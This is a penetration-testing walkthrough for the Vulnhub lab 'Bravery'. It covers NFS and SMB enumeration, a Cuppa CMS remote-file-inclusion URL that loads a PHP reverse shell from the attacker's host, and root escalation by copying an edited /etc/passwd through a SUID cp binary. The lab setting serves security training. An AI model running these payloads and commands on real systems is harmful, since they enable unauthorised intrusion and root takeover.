digitalworld.local-BRAVERY: Vulnhub Walkthrough
Today we will be solving a boot2root lab from Vulnhub called Bravery. This lab, like many others, is a good way to keep your penetration testing skills sharp while getting some variety.
Download it from here: https://www.vulnhub.com/entry/digitalworldlocal-bravery,281/
Penetration Methodologies
Scanning
- Netdiscover
- Nmap
Enumeration
- Mount NFS share directory
- SMB shared file enumeration
Exploiting
- Abusing CMS via RFI
- Obtaining reverse shell via netcat
Privilege Escalation
- Abusing SUID binary
- Capture the Flag
Walkthrough
Scanning
Let’s start with network scanning to identify the IP of VM with the help of netdiscover.
So we have our target IP 192.168.1.105 now, let’s scan services and ports via nmap.
nmap -A 192.168.1.105
We got a fruitful result from nmap scan as we saw so many services were running on the various port.
Enumeration
We found network share service is available via port 2049, so we thought to check shared directory in the network. We have therefore installed NFS-client on our local machine and have a command to identify the shared directory available to mount on our local computer.
showmount -e 192.168.1.105
we found /var/nfsshare is a shared directory that we can mount in our local machine as given below:
mkdir /tmp/raj mount -t nfs 192.168.1.105:/var/nfsshare /tmp/raj cd /tmp/raj ls cat discovery cat enumeration cat explore cat password.txt cat qwertyuioplkjhgfdsazxcvbnm
Hmmm!!! After exploring all files, we concluded that “qwertyuioplkjhgfdsazxcvbnm” could be the password.
Because port 445 is also available for SMB, even we have also obtained a password recently thus we can try connecting to SMB to list shared folders. But first we need to enumerate SMB shared directory and for that, we can go with Enum4linux.
enum4linux 192.168.1.105
As you can observe, enum4linux showed two shared folders: anonymous and secured. And we can access them with the help of smb-client.
smbclient //192.168.1.105/anonymous password: qwertyuioplkjhgfdsazxcvbnm
We have successfully accessed the shared folder “anonymous”, where I have seen some user’s folders. But while doing an internal recon, I didn’t notice any interesting clues.
So, I’m moving to another “secured” folder and here I found three files, which I downloaded on my local computer.
smbclient //192.168.1.105/secured -U David password: qwertyuioplkjhgfdsazxcvbnm get david.txt get genevieve.txt get README.txt
Then, each file opened, and some helpful URLs were found, we’re going to navigate them one by one, moreover, the last line was pitching for any CMS login.
Initially, we looked at the URL given below but that was no use to us.
//192.168.1.105/devlopmentsecretpage
We then explored another URL and found no useful stuff here, too.
//192.168.1.105/devops/directortestpagev1.php
At last we move to the third and final URL found from the genevieve.txt. Fortunately, I found the following web page differing from two previous results and it could have been CMS.
I found a Cuppa CMS login page by exploring other tabs. This might be a turning point as we are attempting to exploit CMS cuppa.
Exploiting
I dig out cuppa exploit from inside the searchsploit without wasting time and the CMS is vulnerable to LFI/RFI.
Thus, I found a Remote Inclusion File URL when I checked the POC. We now have to be prepared with a reverse shell for the exploitation of RFI.
Therefore, I used php-reverse-shell from inside /usr/share/webshell/php and modified the listening IP with Kali’s IP then launch Python HTTP server for file transferring and start netcat listener on listening port.
When everything is ready! Just trigger the following URL to exploit RFI.
//192.168.1.105/genevieve/cuppaCMS/alerts/alertConfigField.php?urlConfig=//192.168.1.110:8000/shell.php?
We’ll get a netcat session for the victim’s machine as soon as we trigger the URL. Now we have a low privilege shell and we need to enhance privilege in order to achieve a higher privilege shell. Therefore, to find SUID enable binaries, I run the following command.
find / -perm -u=s -type f 2>/dev/null
Hmmm! So here I notice cp (copy command) has SUID permission that means I can copy any file as root. Now let’s try to escalate the privilege by exploiting SUID enable binary by copying our edited /etc/passwd file inside the victim’s machine.
Privilege Escalation
Suppose I would like to create a new user (raj) with root privilege inside /etc/password file of victim’s machine. So first we need to copy the content of /etc/passwd file in a text file inside our local machine and then with the help of OpenSSL generates the salt password for user raj and then copy the salt value.
Now open the text file where you have pasted the content of /etc/passwd of victim’s machine and add a new row for user raj along with the salt value that we have generated. Named the file as passwd and transfer this file into victim machine, so that we can replace our /etc/passwd file with original /etc/passwd file of the VM.
For downloading /etc/passwd file into Victim’s machine, execute the following command and get the root access to grab the flag.
cd /tmp wget //192.168.1.110:8000/passwd cp passwd /etc/passwd su raj cd /root ls cat proof.txt
Author: Aarti Singh is a Researcher and Technical Writer at Hacking Articles an Information Security Consultant Social Media Lover and Gadgets. Contact here